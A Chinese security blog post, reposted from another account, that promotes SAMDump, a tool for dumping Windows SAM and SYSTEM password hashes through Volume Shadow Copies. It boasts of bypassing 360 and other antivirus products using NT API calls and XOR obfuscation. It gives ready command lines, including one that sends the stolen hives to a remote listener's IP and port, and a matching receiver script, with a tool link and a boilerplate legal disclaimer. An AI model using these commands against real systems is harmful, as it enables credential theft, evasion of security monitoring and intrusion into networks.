文章总结： SAMDump是一款利用卷影复制服务(VSS)和NTAPI绕过文件锁定及杀软监控，提取Windows系统SAM和SYSTEM文件中密码哈希的工具。它支持XOR编码混淆数据，并提供本地保存或远程传输两种方式渗出文件，旨在隐蔽地获取凭证，适用于内网渗透和红队活动。 综合评分： 91 文章分类： 渗透测试,红队,内网渗透

SAMDump 卷影复制dump hash绕过所有杀软

原创

json

实战攻防安全

2025年12月20日 14:10 广东

亲测可以绕过360核晶以及国内外主流杀软

工具用途

SAMDump 是一个用于提取 Windows 系统中 SAM（安全账户管理器）和 SYSTEM 文件的工具。这些文件包含系统用户的密码哈希等敏感信息，工具通过卷影复制服务（VSS）实现提取，并提供多种数据渗出和混淆功能。

核心功能

1. 卷影副本操作

   ：

• 列出已有的卷影副本，若不存在则自动创建
• 从卷影副本中提取 SAM 和 SYSTEM 文件（绕过文件锁定限制）
• 创建的卷影副本会在约 5 分钟后自动删除

1. 文件操作与混淆

   ：

• 使用 NT API（如 NtCreateFile、NtReadFile、NtWriteFile）进行文件操作，以绕过部分监控和用户态 API 钩子
• 支持 XOR 编码对文件进行混淆，规避签名检测

1. 数据渗出方式

   ：

• 本地保存：将提取的文件保存到指定目录（默认 C:\Windows\tasks）
• 网络传输：将文件发送到远程服务器

使用方式

工具运行（SAMDump.exe）

通过命令行参数指定操作模式，支持的核心选项包括：

• --save-local

  ：本地保存文件（默认关闭）

• --output-dir

  ：指定本地保存目录

• --send-remote

  ：远程传输文件（默认关闭）

• --host

  /--port：指定远程服务器的 IP 和端口

• --xor-encode

  ：启用 XOR 编码（默认关闭）

• --xor-key

  ：指定 XOR 密钥（默认 SAMDump2025）

示例：

# 本地保存且不编码
SAMDump.exe --save-local --output-dir "C:\temp"

# 远程传输且启用 XOR 编码
SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

配套组件

1. 服务器接收（server.py）

   ：

• 用于接收远程传输的文件，支持自动 XOR 解码
• 保存的文件名会自动包含客户端 IP 和日期，方便多设备管理
• 使用示例：python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

1. 本地解码（xor-decoder.py）

   ：

• 用于解码本地保存的 XOR 编码文件
• 需要指定 SAM 和 SYSTEM 编码文件路径、密钥及输出目录
• 使用示例：python xor-decoder.py --sam "sam.enc" --system "system.enc" --xor-key "customKey"

设计动机

传统通过 vssadmin 工具提取 SAM/SYSTEM 文件的方式易被安全解决方案检测。SAMDump 的优势在于：

• 远程传输模式下不写入目标文件系统，减少痕迹
• XOR 编码提供基础混淆，规避签名检测
• 采用 NT API 调用，绕过部分用户态监控机制

工具链接

https://github.com/ricardojoserf/SAMDump

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：实战攻防安全 json《SAMDump 卷影复制dump hash绕过所有杀软》